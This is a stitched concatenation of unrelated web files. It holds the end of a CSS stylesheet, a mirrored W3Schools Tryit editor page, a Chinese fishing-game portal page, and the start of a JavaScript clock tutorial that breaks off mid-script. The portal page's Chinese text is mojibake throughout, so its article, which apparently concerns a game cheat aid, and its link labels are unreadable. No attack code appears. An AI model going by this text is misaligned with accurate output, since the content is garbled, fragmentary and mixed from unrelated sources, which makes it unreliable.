margin-top: 25px;
display: inline-block;
*display: inline;
*zoom: 1;
}
.info .name{
font-size: 15px;
margin-bottom: 5px;
}
.info .data{
line-height: 25px;
}
.info .data a{
font-size: 14px;
color: #a0a0a0;
margin-right: 15px;
}
.category li .brands{
float: left;
margin-top: 25px;
display: inline-block;
*display: inline;
*zoom: 1;
}
.brands .name{
font-size: 15px;
margin-bottom: 5px;
}
.brands .data{
line-height: 25px;
}
/*分类浏览end*/
.hide{display:none}
.up-top{
display: block;
height: 225px;
}
.scroll{
position: fixed;
top:159px;
}
#proA{
margin-top: 17px;
}
.back_new{
width: 55px;
height:52px;
background:url(../images/head.png) no-repeat 0 center;
display:inline-block;
}
.search-area{position:relative;width:75%;}
.search-area .search-icon{
background: url("../images/head.png") no-repeat scroll -45px center rgba(0, 0, 0, 0);
display: inline-block;
height:52px;
width: 55px;
text-indent:-9999px;
}
.srp {
display:table;
width:49%;
float:left;
display:flex;
flex-wrap:wrap;
font-family:tahoma,arial,\9ED1\4F53;
background-color:#f4f4f4;
margin-top:15px;
}
.srp:after {
display:block;
clear:both;
height:0;
content:' '
}
.srp em {
font-style:normal
}
.srp .product {
display:inline-block;
float:none;
display:flex;
align-items:stretch;
-webkit-box-sizing:border-box;
-moz-box-sizing:border-box;
-ms-box-sizing:border-box;
-o-box-sizing:border-box;
box-sizing:border-box;
padding:0;
padding-bottom:0
}
.srp .pro-inner {
position:relative;
background-color:#fff;
border-bottom:1px solid #c1c1c1;
border-left:1px solid #d8d8d8;
border-right:1px solid #d8d8d8;
border-top:1px solid #e5e6e8;
-webkit-box-shadow:#d2d2d4 0 0.1em 0;
-moz-box-shadow:#d2d2d4 0 0.1em 0;
box-shadow:#d2d2d4 0 0.1em 0;
-webkit-box-sizing:border-box;
-moz-box-sizing:border-box;
box-sizing:border-box;
overflow:hidden;
width:100%;
height:100%
}
.srp .proImg-wrap {
float:left;
}
.srp .proImg-wrap img {
border-radius:5px
}
.srp .proInfo-wrap {
float:left;
padding:5px;
width:100%;
-webkit-box-sizing:border-box;
-moz-box-sizing:border-box;
-ms-box-sizing:border-box;
-o-box-sizing:border-box;
box-sizing:border-box
}
.srp .proPrice {
font-family:arial;
height:20px;
line-height:21px;
text-align:center;
}
.srp .proPrice em {
color:#c00;
font-size:16px;
font-weight:700;
margin-left:2px
}
.srp .proPrice del {
color:#999;
font-size:12px
}
.srp .proTitle {
overflow:hidden;
text-align:center;
}
.srp .proTitle a {
color:#333;
font-size:14px;
text-decoration:none;
-webkit-transition:all .3s linear
}
.srp .proSales {
float:left;
color:#999;
font-size:12px;
font-family:arial
}
.srp .proSales em {
color:#333
}
.srp .proService {
color:#333;
font-size:13px;
height:20px;
line-height:21px
}
.srp .proIcons {
padding-left:10px;
height:20px;
overflow:hidden
}
.srp .proIcons>* {
margin:0 3px 0 0
}
.srp .proIcons img {
vertical-align:middle
}
.srp .proSales {
line-height:16px;
margin-top:3px
}
.srp.list {
width:100%
}
.srp.list .product {
width:100%;
padding:15px 10px;
border-bottom:1px solid #cacaca
}
.srp.list .pro-inner {
width:100%;
background-color:transparent;
box-shadow:none
}
.srp.list .proImg-wrap {
width:26.4%;
margin-right:10px;
-webkit-transition:all .6s linear
}
.srp.list .proImg-wrap img {
width:100%
}
.srp.list .proInfo-wrap {
float:none;
padding:0;
padding-left:90px
}
.srp.list .proTitle {
line-height:17px;
height:36px;
margin-bottom:8px
}
.srp.list .proTitle a {
font-size:13px
}
.srp.list .proPrice {
float:left;
margin-right:10px
}
.srp.list .proPrice del {
display:none
}
.srp.album .product {
width:100%;
}
.srp.album .product:nth-child(2n+1) {
padding-right:0px
}
.srp.album .product:nth-child(2n) {
padding-left:5px
}
.srp.album .pro-inner {
align-items:stretch;
padding-bottom:50px;
height:auto
}
.srp.album .proInfo-wrap {
position:absolute;
bottom:5px;
width:100%;
-webkit-box-sizing:border-box;
-moz-box-sizing:border-box;
-ms-box-sizing:border-box;
-o-box-sizing:border-box;
box-sizing:border-box
}
.srp.album .proImg-wrap {
width:100%
}
.srp.album .proImg-wrap img {
width:100%;
border-radius:5px 5px 0 0
}
.srp.album .proTitle {
height:19px;
position:relative;
top:19px;
white-space:nowrap;
text-overflow:ellipsis
}
.srp.album .proPrice {
position:relative;
top:-19px
}
.srp.album .proPrice del {
display:none
}
.srp.album .proService {
display:none
}
.srp.album .proSales {
float:right;
position:relative;
top:-36px;
right:2px;
margin:0
}
.srp.album .proIcons {
padding-left:0;
width:100%;
position:relative;
top:-16px
}
.srp.grid .product {
width:100%;
-webkit-transition:all .5s linear
}
.srp.grid .proImg-wrap {
width:100%
}
.srp.grid .proImg-wrap img {
width:100%;
border-radius:5px 5px 0 0
}
.srp.grid .proTitle {
height:19px
}
.srp.grid .proPrice {
float:left;
margin-right:10px
}
.srp.grid .proPrice em {
margin-right:10px
}
.srp.grid .proPrice del {
display:none
}
.srp.grid .proService,.srp.grid .proIcons {
float:none
}
.srp.grid .proSales {
clear:left
}
@media screen and (max-device-height:568px) and (orientation:portrait) {
.srp {
display:table;
width:100%
}
.srp .product {
display:inline-block;
float:none
}
.srp.album .proImg-wrap {
overflow:hidden;
}
}@media screen and (min-device-width:768px) and (orientation:portrait) {
.srp {
display:table;
width:100%
}
.srp .product {
display:inline-block;
float:none
}
.srp.album .proImg-wrap {
overflow:hidden;
}
}@media screen and (max-device-width:480px) and (orientation:portrait) {
.srp.album .proImg-wrap {
overflow:hidden;
}
}
.pages {
width: 100%;
text-align:center;
margin-top:30px;
}
.pages .pre,.pages .next {
border-radius:5px;
background:#D53A26;
padding:3px 7px;
margin:0 20px;
display:inline-block;
}
.pages .preno,.pages .nextno {
border-radius:5px;
background:#666;
padding:3px 7px;
margin:0 20px;
display:inline-block;
}
.pages a{
color:#FFF;
}
.paixu .tab{width: 100%;height: 44px;text-align: center;line-height: 44px;background-color: #f7f7f7;border-bottom:1px solid #e6e6e6;}
.paixu .tab a{width: 24%;float: left;display: inline-block;*display: inline;*zoom:1;height: 44px;border-right:1px solid #e6e6e6;font-size:14px;}
.paixu .tab a.click{border-right: none;}
.paixu .tab a.on{color:#F7762E;}
.brands .data A {
margin: 5px;
background-color: #FFFFFF;
border: 2px solid #fff;
color: #000000;
display: block;
float: left;
padding-left: 5px;
padding-right: 5px;
text-align: center;
text-decoration: none;
white-space: nowrap;
cursor:pointer;
}
.brands .data A:hover {
margin: 5px;
background-color: #FFFFFF;
border: 2px solid #F7762E;
color: #000000;
display: block;
float: left;
padding-left: 5px;
padding-right: 5px;
text-align: center;
text-decoration: none;
white-space: nowrap;
cursor:pointer;
}
.brands .data A:focus {
outline-style: none;
cursor:pointer;
}
.brands .data A.selected {
background: url("../images/select.gif") #FFF no-repeat scroll right bottom;
border: 2px solid #F7762E;
margin: 5px;
cursor:pointer;
}
.brands .selected A:hover {
background: url("../images/select.gif") no-repeat scroll right bottom rgba(0, 0, 0, 0);
border: 2px solid #CC0000;
cursor:pointer;
}
|
Coding/W3School/W3Schools_Offline_2015/www.w3schools.com/jsref/tryit45bd.html | platinhom/ManualHom |
<!DOCTYPE html>
<html lang="en-US">
<!-- Mirrored from www.w3schools.com/jsref/tryit.asp?filename=tryjsref_script_src by HTTrack Website Copier/3.x [XR&CO'2014], Fri, 23 Jan 2015 08:34:52 GMT -->
<head>
<title>Tryit Editor v2.3</title>
<meta id="viewport" name='viewport'>
<script>
(function() {
if ( navigator.userAgent.match(/iPad/i) ) {
document.getElementById('viewport').setAttribute("content", "width=device-width, initial-scale=0.9");
}
}());
</script>
<link rel="stylesheet" href="../trycss.css">
<!--[if lt IE 8]>
<style>
.textareacontainer, .iframecontainer {width:48%;}
.textarea, .iframe {height:800px;}
#textareaCode, #iframeResult {height:700px;}
.menu img {display:none;}
</style>
<![endif]-->
<script>
(function(i,s,o,g,r,a,m){i['GoogleAnalyticsObject']=r;i[r]=i[r]||function(){
(i[r].q=i[r].q||[]).push(arguments)},i[r].l=1*new Date();a=s.createElement(o),
m=s.getElementsByTagName(o)[0];a.async=1;a.src=g;m.parentNode.insertBefore(a,m)
})(window,document,'script','../../www.google-analytics.com/analytics.js','ga');
ga('create', 'UA-3855518-1', 'auto');
ga('require', 'displayfeatures');
ga('send', 'pageview');
</script>
<script>
var googletag = googletag || {};
googletag.cmd = googletag.cmd || [];
(function() {
var gads = document.createElement('script');
gads.async = true;
gads.type = 'text/javascript';
var useSSL = 'https:' == document.location.protocol;
gads.src = (useSSL ? 'https:' : 'http:') +
'//www.googletagservices.com/tag/js/gpt.js';
var node = document.getElementsByTagName('script')[0];
node.parentNode.insertBefore(gads, node);
})();
</script>
<script>
googletag.cmd.push(function() {
googletag.defineSlot('/16833175/TryitLeaderboard', [[728, 90], [970, 90]], 'div-gpt-ad-1383036313516-0').addService(googletag.pubads());
googletag.pubads().setTargeting("content","tryjs");
googletag.pubads().enableSingleRequest();
googletag.enableServices();
});
</script>
<script type="text/javascript">
function submitTryit()
{
var t=document.getElementById("textareaCode").value;
t=t.replace(/=/gi,"w3equalsign");
var pos=t.search(/script/i)
while (pos>0)
{
t=t.substring(0,pos) + "w3" + t.substr(pos,3) + "w3" + t.substr(pos+3,3) + "tag" + t.substr(pos+6);
pos=t.search(/script/i);
}
if ( navigator.userAgent.match(/Safari/i) ) {
t=escape(t);
document.getElementById("bt").value="1";
}
document.getElementById("code").value=t;
document.getElementById("tryitform").action="tryit_view52a0.html?x=" + Math.random();
validateForm();
document.getElementById("iframeResult").contentWindow.name = "view";
document.getElementById("tryitform").submit();
}
function validateForm()
{
var code=document.getElementById("code").value;
if (code.length>8000)
{
document.getElementById("code").value="<h1>Error</h1>";
}
}
</script>
<style>
</style>
</head>
<body>
<div id="ads">
<div style="position:relative;width:100%;margin-top:0px;margin-bottom:0px;">
<div style="width:974px;height:94px;position:relative;margin:0px;margin-top:5px;margin-bottom:5px;margin-right:auto;margin-left:auto;padding:0px;overflow:hidden;">
<!-- TryitLeaderboard -->
<div id='div-gpt-ad-1383036313516-0' style='width:970px; height:90px;'>
<script type='text/javascript'>
googletag.cmd.push(function() { googletag.display('div-gpt-ad-1383036313516-0'); });
</script>
</div>
<div style="clear:both"></div>
</div>
</div>
</div>
<div class="container">
<div class="textareacontainer">
<div class="textarea">
<div class="headerText" style="width:auto;float:left;">Edit This Code:</div>
<div class="headerBtnDiv" style="width:auto;float:right;margin-top:8px;margin-right:2.4%;"><button class="submit" type="button" onclick="submitTryit()">See Result »</button></div>
<div class="textareawrapper">
<textarea autocomplete="off" class="code_input" id="textareaCode" wrap="logical" xrows="30" xcols="50"><!DOCTYPE html>
<html>
<body>
<script id="myScript" src="demo_script_src.js"></script>
<p>Click the button to get the URL of the external script file.</p>
<button onclick="myFunction()">Try it</button>
<p id="demo"></p>
<script>
function myFunction() {
var x = document.getElementById("myScript").src;
document.getElementById("demo").innerHTML = x;
}
</script>
</body>
<!-- Mirrored from www.w3schools.com/jsref/tryit.asp?filename=tryjsref_script_src by HTTrack Website Copier/3.x [XR&CO'2014], Fri, 23 Jan 2015 08:34:52 GMT -->
</html>
</textarea>
<form autocomplete="off" style="margin:0px;display:none;" action="http://www.w3schools.com/jsref/tryit_view.asp" method="post" target="view" id="tryitform" name="tryitform" onsubmit="validateForm();">
<input type="hidden" name="code" id="code" />
<input type="hidden" id="bt" name="bt" />
</form>
</div>
</div>
</div>
<div class="iframecontainer">
<div class="iframe">
<div class="headerText resultHeader">Result:</div>
<div class="iframewrapper">
<iframe id="iframeResult" class="result_output" frameborder="0" name="view" xsrc="tryjsref_script_src.html"></iframe>
</div>
<div class="footerText">Try it Yourself - © <a href="../index.html">w3schools.com</a></div>
</div>
</div>
</div>
<script>submitTryit()</script>
</body>
</html> |
wulu/2015.11.23/qipai/buyu/269.html | bylu/Test | <!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3c.org/TR/1999/REC-html401-19991224/loose.dtd">
<head>
<meta http-equiv="Content-Type" content="text/html; charset=gb2312" />
<title>³¬Éù²¨²¶ÓãÆ÷</title>
<meta name="keywords" content="³¬Éù²¨²¶ÓãÆ÷" />
<meta name="description" content="ÏÖÔÚ»¥ÁªÍøÉÏÊ®·ÖÁ÷ÐÐÒ»ÖÖÓÎÏ·£¬ÄǾÍÊDz¶ÓãÀàÓÎÏ·¡£²¶ÓãÀàÓÎÏ·ÊÇÒ»ÖÖÉä»÷ÀàÓÎÏ·£¬µ«ÊÇÔÚÓÎÏ·½çÃæÒÔ¼°²Ù×÷ÉÏÓÐÁ˺ܴóµÄ´´Ð¡£ËüÊÇÒÔº£µ×ÊÀ½ç×÷ΪÓÎÏ·µÄ±³¾°£¬Íæ¼ÒÒÔ²¶ÓãΪÓÎÏ·Ä¿µÄ£¬Í¨¹ý´³µ´Ò»¸ö¸öСµºÀ´Íê³ÉÏàÓ¦µÄ¾çÇé¡£ÔÚÓÎÏ·²Ù×÷ÉÏ£¬Õâ¿î²¶ÓãÀàÓÎÏ·²¢Ã»ÓÐ" />
<link rel=stylesheet type=text/css href="/qipai/templets/default/style/style.css">
<link rel=stylesheet type=text/css href="/qipai/templets/default/style/p.css">
<link rel=stylesheet type=text/css href="/qipai/templets/default/style/common.css">
<script tyep="text/javascript" src="/qipai/templets/default/js/jquery-1.8.3.min.js"></script>
</head>
<body>
<DIV class=top>
<DIV class=c_960>
<DIV class=top-nav><SPAN>Hi£¬»¶ÓÀ´µ½789ÓÎÏ·ÖÐÐÄ£¡</SPAN></DIV>
<DIV><!-- logo -->
<DIV style="POSITION: relative" class=logo><A href="http://www.789game.com"></A></DIV>
<DIV class=nav>
<UL>
<LI><a href="http://www.789game.com/" target="_blank">ÍøÕ¾Ê×Ò³</a></LI>
<li><a href='/qipai/qipaiyouxipingtai/' target="_blank" >ÆåÅÆÓÎϷƽ̨</a></li>
<li><a href='http://www.789game.com/GameIntroduction.aspx' target="_blank" >ÓÎÏ·½éÉÜ</a></li>
<li><a href='http://www.789game.com/NewsList.aspx' target="_blank" >ÐÂÎŹ«¸æ</a></li>
<li><a href='http://shuihu.789game.com/' target="_blank" >½Ö»úˮ䰴«</a></li>
<li><a href='http://www.789game.com/xinshoubangzhu.html' target="_blank" >ÐÂÊÖ°ïÖú</a></li>
<li><a href='http://buyu.789game.com/' target="_blank" >½Ö»úǧÅÚ²¶Óã</a></li>
</UL>
</DIV>
<!-- µ¼º½À¸½áÊø -->
</DIV>
</DIV>
</DIV>
<div style="BORDER: #cdcdcd 1px solid; margin-top:10px; width:960px; margin:5px auto">
<div id="lunbobg">
<ul>
<li><a href="http://www.789game.com/NewsShow.aspx?XID=439"> <img src="/qipai/templets/default/images/1-1.jpg" width="960" height="424"></a></a></li>
<li><a href="http://down.789game.net/tgdownload/1272461/789GameCenter.exe"> <img src="/qipai/templets/default/images/2-1.jpg" width="960" height="424"></a></a></li>
<li><a href="http://www.789game.com/NewsShow.aspx?XID=2006"> <img src="/qipai/templets/default/images/3-1.jpg" width="960" height="424"></a></a></li>
</ul>
</div>
</div>
<div class="main">
<div id=p_con><!--Ò³Ãæ×ó²à²¿·Ö ¿ªÊ¼ -->
<div class=p_l>
<div class=location>
<img src="/qipai/templets/default/images/flag.png" width=16 height=16> µ±Ç°Î»ÖÃ:</strong><a href='/qipai'>ÆåÅÆÓÎÏ·</a> > <a href='/qipai/buyu/'>²¶ÓãÓÎÏ·</a> >
</div>
<div id=pnlContent>
<h1 class=que-title>³¬Éù²¨²¶ÓãÆ÷</h1>
<div class="articelinfo"><span>×÷Õߣºadmin</span><span>·¢²¼Ê±¼ä£º2014-09-02</span></div>
<div class=que-content>
<div>
</div>
<div>
</div>
<div>
ÏÖÔÚ»¥ÁªÍøÉÏÊ®·ÖÁ÷ÐÐÒ»ÖÖÓÎÏ·£¬ÄǾÍÊDz¶ÓãÀàÓÎÏ·¡£²¶ÓãÀàÓÎÏ·ÊÇÒ»ÖÖÉä»÷ÀàÓÎÏ·£¬µ«ÊÇÔÚÓÎÏ·½çÃæÒÔ¼°²Ù×÷ÉÏÓÐÁ˺ܴóµÄ´´Ð¡£ËüÊÇÒÔº£µ×ÊÀ½ç×÷ΪÓÎÏ·µÄ±³¾°£¬Íæ¼ÒÒÔ²¶ÓãΪÓÎÏ·Ä¿µÄ£¬Í¨¹ý´³µ´Ò»¸ö¸öСµºÀ´Íê³ÉÏàÓ¦µÄ¾çÇé¡£ÔÚÓÎÏ·²Ù×÷ÉÏ£¬Õâ¿î²¶ÓãÀàÓÎÏ·²¢Ã»ÓÐʲô¸´Ôӵĵط½£¬Íæ¼ÒÖ»ÐèÒªÔÚÓãȺÖмäµã»÷£¬¼´¿É·¢ÉäÅÚµ¯£¬ÔÚ²¶×½µ½Ð¡Óãºó£¬¾Í»áת»¯Îª½ð±Ò¡£²»¹ý£¬Õâ¿´ËÆ¼òµ¥µÄÓÎÏ·£¬Íæµ½Á˺óÃæÄã¾ÍÄܸÐÊܵ½ÄѶÈÁË£¬²¢²»ÊÇËùÓеÄÓã¶¼ÄÇôºÃ×¥£¬Õâʱºò£¬ÓÐÒ»¿î¸¨ÖúÒ²Ðí»áÈÃÄã±äµÃµÃÐÄÓ¦ÊÖ¡£ÄǾÍÊdz¬Éù²¨²¶ÓãÆ÷£¬ÕâÊÇÒ»ÖÖÓÎÏ·¸¨Öú£¬¸ù¾Ý˵Ã÷°²×°ºó£¬¾ÍÄÜÈÃÄãµÄ²¶Óã±äµÃÊ®·ÖµÄ¼òµ¥¡£²»¹ý£¬°²×°Á˳¬Éù²¨²¶ÓãÆ÷£¬¾ÍʧȥÁËÓÎÏ·±¾ÉíµÄÀÖȤ£¬±Ï¾¹£¬ÍæÓÎÏ·¾ÍÊÇΪÁËÌôÕ½ÄѶȣ¬Èç¹ûÖ»ÊÇΪÁËͨ¹Ø¶øÍ¨¹Ø£¬ÄÇÓéÀÖÐÔ¾ÍûÄÇôǿÁË¡£</div>
</div>
<div class=pre-nex>ÉÏһƪ£º<a href='/qipai/buyu/268.html'>²¶ÓãÖ®º£µ×ÀÌ</a> ÏÂһƪ£º<a href='/qipai/buyu/271.html'>²¶Óã´ïÈ˼¼ÇÉ</a> </div>
</div>
</div>
<!--ÓÒ²àÏÂÔØ begin-->
<DIV class=p_r_xiazai>
<DIV class=r_ad>
<DIV class=dl_client_v2>
<A style="BACKGROUND-POSITION: 22px -536px" href="http://down.789game.net/tgdownload/1272461/789GameCenter.exe" class=client_dl title=ÏÂÔØ¿Í»§¶Ë rel=nofollow></A>
</DIV>
</DIV>
</div>
<div class="ewmDown">
<div class="anzhuoDown">
<a href="http://download.6513.com/phoneGame/590145BY.apk" class="dowmForA" rel="nofollow"></a>
</div>
<div class="appleDown">
<a href="https://itunes.apple.com/us/app/jie-ji-jin-chan-bu-yu-mian/id1022745046?l=zh&ls=1&mt=8" class="dowmForI" target='_blank' rel="nofollow"></a>
</div>
</div>
<DIV class=p_r>
<DIV class=tags>
<DL class=box_dl>
<DT>ÓÎÏ·½éÉÜ</DT>
<DIV class=tags>
<A href="http://www.789game.com/GameRulesShow.aspx?XID=610" target="_blnak">½ð󸲶Óã</A>
<A href="http://shuihu.789game.com/" target="_blnak">°ÙÒ×ˮ䰴«</A>
<A href="http://www.789game.com/GameRulesShow.aspx?XID=601" target="_blnak">´óÊ¥ÄÖº£</A>
<A href="http://www.789game.com/GameRulesShow.aspx?XID=203" target="_blnak">ˮ䰴«</A>
<A href="http://www.789game.com/GameRulesShow.aspx?XID=2040" target="_blank">нð󸲶Óã</A>
<A href="http://www.789game.com/GameRulesShow.aspx?XID=6" target="_blank">789Ó®ÈýÕÅ</A>
<A href="http://www.789game.com/GameRulesShow.aspx?XID=361" target="_blank">¶þÈËÂ齫</A>
<A href="http://www.789game.com/GameRulesShow.aspx?XID=102" target="_blank">¶þÈ˶·Å£</A>
<A href="http://www.789game.com/GameRulesShow.aspx?XID=27" target="_blank">ËÄÈ˶·Å£</A>
<A href="http://www.789game.com/GameRulesShow.aspx?XID=200" target="_blank">¶·µØÖ÷</A>
<A href="http://www.789game.com/GameRulesShow.aspx?XID=5501" target="_blank">ÀîåÓÅüÓã</A>
<A href="http://www.789game.com/" target="_blank">ÆåÅÆÆ½Ì¨</A>
<A href="http://www.789game.com/NewsShow.aspx?XID=130" target="_blank">ÓÎÏ·Ìü²¶Óã´ïÈË</A>
<A href="http://buyu.789game.com/" target="_blank">½Ö»úǧÅÚ²¶Óã¹ÙÍø</A>
</DIV>
</DL>
</DIV>
<DL class=box_dl>
<DT>ÍÆ¼öÎÄÕÂ</DT>
<DD><a href="/qipai/buyu/1142.html">²¶ÓãÓÎÏ·¹Ù·½ÍøÂçÆÆ½â°æµÄÓÅÊÆ</a> </DD>
<DD><a href="/qipai/buyu/1141.html">²¶Óã¼ÙÈÕÓÎÏ·¹¥ÂÔ°µ½¸µºÓãÀà´ó½â</a> </DD>
<DD><a href="/qipai/buyu/1140.html">²¶Óã¼ÙÈÕÊÖ»úÓÎÏ·Íæ·¨¹¥ÂÔÖ®ÓÊÏä</a> </DD>
<DD><a href="/qipai/buyu/1139.html">°²×¿É²¶ÓãÖ®º£Ñó´óÍø²¶ÓãÍ϶à</a> </DD>
<DD><a href="/qipai/buyu/1138.html">²¶Óã¼ÙÈÕÓÎÏ·¼¼Çɹ¥ÂÔÖ®Ôõô°Ý·Ã</a> </DD>
<DD><a href="/qipai/buyu/1137.html">²¶Óã¼ÙÈÕÓÎÏ·¹Ù·½¹¥ÂÔÖ®·ï»ËʯÊÇ</a> </DD>
<DD><a href="/qipai/buyu/1136.html">²¶Óã¼ÙÈÕÓÎÏ·Ë®×å¹ÝÈÝÁ¿Ì«Ð¡ÎÊÌâ</a> </DD>
<DD><a href="/qipai/buyu/1135.html">²¶Óã¼ÙÈÕÎÞÏÞÄÜÁ¿ÆÆ½â°æÖÐСºÅ¹Ü</a> </DD>
<DD><a href="/qipai/buyu/1132.html">´òÓãÓÎÏ·ÆÆ½â°æ¿Í»§¶ËÏÂÔØ-1000</a> </DD>
<DD><a href="/qipai/buyu/1131.html">²¶Óã¼ÙÈÕ¼¼Çɹ¥ÂÔÖ®ÔªÏüµÄÓ÷¨</a> </DD>
</DL>
<DL class=box_dl>
<DT>×îÈÈÎÄÕÂ</DT>
<DD><a href="/qipai/buyu/672.html">ÓÎÏ·Ìü²¶Óã´ïÈ˹¥ÂÔ</a> </DD>
<DD><a href="/qipai/buyu/980.html">²¶Óã´ïÈË3¡ªÐ¾«²Ê</a> </DD>
<DD><a href="/qipai/buyu/278.html">²¶Óã¸ßÊÖ</a> </DD>
<DD><a href="/qipai/buyu/571.html">°²×¿²¶Óã´ïÈË2ÆÆ½â°æ</a> </DD>
<DD><a href="/qipai/buyu/266.html">²¶Óã´ïÈËÆÆ½â°æ</a> </DD>
<DD><a href="/qipai/buyu/414.html">²¶Óã´ïÈËÁª»ú°æ</a> </DD>
<DD><a href="/qipai/buyu/477.html">²¶Óã´ïÈ˵¥»ú°æÏÂÔØ</a> </DD>
<DD><a href="/qipai/buyu/563.html">°²×¿²¶Óã´ïÈË</a> </DD>
<DD><a href="/qipai/buyu/817.html">ÓÎÏ·Ìü´òÓã¼¼ÇÉ</a> </DD>
<DD><a href="/qipai/buyu/253.html">ÉñÎä²¶Óã¼¼ÇÉ</a> </DD>
</DL>
</DIV>
</div>
<!--Ò³ÃæÓҲಿ·Ö ½áÊø -->
</div>
</div>
<DIV class=footer>
µÖÖÆ²»Á¼ÓÎÏ· ¾Ü¾øµÁ°æÓÎÏ· ×¢Òâ×ÔÎÒ±£»¤ ½÷·ÀÊÜÆÉϵ± ÊʶÈÓÎÏ·ÒæÄÔ ³ÁÃÔÓÎÏ·ÉËÉí ºÏÀí°²ÅÅʱ¼ä ÏíÊܽ¡¿µÉú»î <BR>
<a href="http://www.789game.com">789ÓÎÏ·ÖÐÐÄ</a>http://www.789game.com/ Ô¥ICP±¸12014032ºÅ-1
±¸°¸ÎĺÅ:ÎÄÍøÓα¸×Ö[2011]C-CBG002ºÅ<BR>¿Í·þQQ£º4000371814 ¿Í·þÈÈÏߣº4000371814 <script type="text/javascript">
var _bdhmProtocol = (("https:" == document.location.protocol) ? " https://" : " http://");
document.write(unescape("%3Cscript src='" + _bdhmProtocol + "hm.baidu.com/h.js%3Fde6684532de22a1b45cd44b14141ff07' type='text/javascript'%3E%3C/script%3E"));
</script>
</DIV>
<style>
#banners {margin-top:-50px;}
#banners .hd {margin-top:-15px;width:100%;float:left;}
#banners .hd ul {width: 555px;z-index: 100; position: absolute; left: 45%; }
#banners .hd ul li {float: left; width: 11px; height: 11px; background-color: #fff; overflow: hidden; text-indent: -9999px; border-radius:6px;cursor:pointer; opacity: 0.5;filter: alpha(opacity=50); cursor: pointer;}
#banners .hd ul li.on {opacity: 1;filter: alpha(opacity=100);}
</style>
<div style="position:absolute;width:200px;top:340px;">
<div id="ad_right" style="position:fixed;width:142px;height:327px;z-index:8886;">
<a style="float:right;position:absolute;left:145px;margin-left:-20px;width:17px;height:17px;background:url(/qipai/templets/default/images/close1.png) no-repeat;z-index:8888;" id="closeleftbar" href="javascript:void(0);"></a>
<div class="leftLoops leftLoop1" style="z-index:8887" id="banners">
<div class="bd bd3">
<ul class="picLists">
<li>
<a href="http://www.789game.com/NewsShow.aspx?XID=439" target="_blank" style="width:100%;float:left;text-align:center;margin-top:50px;">
<img src="/qipai/templets/default/images/001leftQP.jpg" width="142" height="327" alt="" title="" /></a>
</a>
</li>
<li>
<a href="http://www.789game.com/NewsShow.aspx?XID=2006" target="_blank" style="width:100%;float:left;text-align:center;margin-top:50px;">
<img src="/qipai/templets/default/images/sh.jpg" width="142" height="327" alt="" title="" /></a>
</a>
</li>
</ul>
</div>
<div class="hd">
<ul></ul>
</div>
</div>
</div>
<script type="text/javascript" src="/qipai/templets/default/js/jquery.SuperSlide.js"></script>
<script type="text/javascript">
$(document).ready(function () {
$("#closeleftbar").click(function(){
$("#ad_right").css("display","none");
});
});
jQuery("#banners").slide({titCell:".hd ul",mainCell:".bd3 ul",effect:"leftLoop",autoPlay:true,autoPage:true,vis:1,scroll:1,trigger:"click",interTime:3000});</script>
<script type="text/javascript">
$(function() {
var sWidth = $("#lunbobg").width(); //»ñÈ¡½¹µãͼµÄ¿í¶È£¨ÏÔÊ¾Ãæ»ý£©
var len = $("#lunbobg ul li").length; //»ñÈ¡½¹µãͼ¸öÊý
var index = 0;
var picTimer;
//ÒÔÏ´úÂëÌí¼ÓÊý×Ö°´Å¥ºÍ°´Å¥ºóµÄ°ë͸Ã÷Ìõ£¬»¹ÓÐÉÏÒ»Ò³¡¢ÏÂÒ»Ò³Á½¸ö°´Å¥
var btn = "<div class='btnBg'></div><div class='btn'>";
for(var i=0; i < len; i++) {
btn += "<span></span>";
}
btn += "</div><div class='preNext pre'></div><div class='preNext next'></div>";
$("#lunbobg").append(btn);
$("#lunbobg .btnBg").css("opacity",0);
//ΪС°´Å¥Ìí¼ÓÊó±ê»¬Èëʼþ£¬ÒÔÏÔʾÏàÓ¦µÄÄÚÈÝ
$("#lunbobg .btn span").css("opacity",0.4).mouseover(function() {
index = $("#lunbobg .btn span").index(this);
showPics(index);
}).eq(0).trigger("mouseover");
//ÉÏÒ»Ò³¡¢ÏÂÒ»Ò³°´Å¥Í¸Ã÷¶È´¦Àí
$("#lunbobg .preNext").css("opacity",0.08).hover(function() {
$(this).stop(true,false).animate({"opacity":"0.5"},300);
},function() {
$(this).stop(true,false).animate({"opacity":"0.08"},300);
});
//ÉÏÒ»Ò³°´Å¥
$("#lunbobg .pre").click(function() {
index -= 1;
if(index == -1) {index = len - 1;}
showPics(index);
});
//ÏÂÒ»Ò³°´Å¥
$("#lunbobg .next").click(function() {
index += 1;
if(index == len) {index = 0;}
showPics(index);
});
//±¾ÀýΪ×óÓÒ¹ö¶¯£¬¼´ËùÓÐliÔªËØ¶¼ÊÇÔÚͬһÅÅÏò×󸡶¯£¬ËùÒÔÕâÀïÐèÒª¼ÆËã³öÍâΧulÔªËØµÄ¿í¶È
$("#lunbobg ul").css("width",sWidth * (len));
//Êó±ê»¬ÉϽ¹µãͼʱֹͣ×Ô¶¯²¥·Å£¬»¬³öʱ¿ªÊ¼×Ô¶¯²¥·Å
$("#lunbobg").hover(function() {
clearInterval(picTimer);
},function() {
picTimer = setInterval(function() {
showPics(index);
index++;
if(index == len) {index = 0;}
},3000); //´Ë4000´ú±í×Ô¶¯²¥·ÅµÄ¼ä¸ô£¬µ¥Î»£ººÁÃë
}).trigger("mouseleave");
//ÏÔʾͼƬº¯Êý£¬¸ù¾Ý½ÓÊÕµÄindexÖµÏÔʾÏàÓ¦µÄÄÚÈÝ
function showPics(index) { //ÆÕͨÇл»
var nowLeft = -index*sWidth; //¸ù¾ÝindexÖµ¼ÆËãulÔªËØµÄleftÖµ
$("#lunbobg ul").stop(true,false).animate({"left":nowLeft},300); //ͨ¹ýanimate()µ÷ÕûulÔªËØ¹ö¶¯µ½¼ÆËã³öµÄposition
$("#lunbobg .btn span").stop(true,false).animate({"opacity":"0.2"},300).eq(index).stop(true,false).animate({"opacity":"1"},300); //Ϊµ±Ç°µÄ°´Å¥Çл»µ½Ñ¡ÖеÄЧ¹û
}
});
</script>
</body>
</HTML>
|
初级/10-日期对象、网页时钟、倒计时/图片时钟实例.html | linxiaoyan/learning_javascript | <!DOCTYPE html>
<html lang="en">
<head>
<meta charset="UTF-8">
<title>图片时钟效果</title>
</head>
<body>
<div id="time-box">
<img src="" />
<img src="" />
<img src="" />
<img src="" />
<img src="" />
<img src="" />
<img src="" />
<img src="" />
</div>
<script>
window.onload = function () {
var oTimeDiv = document.getElementById('time-box');
var aImage = oTimeDiv.getElementsByTagName('img');
showTime();
setInterval(showTime, 1000);
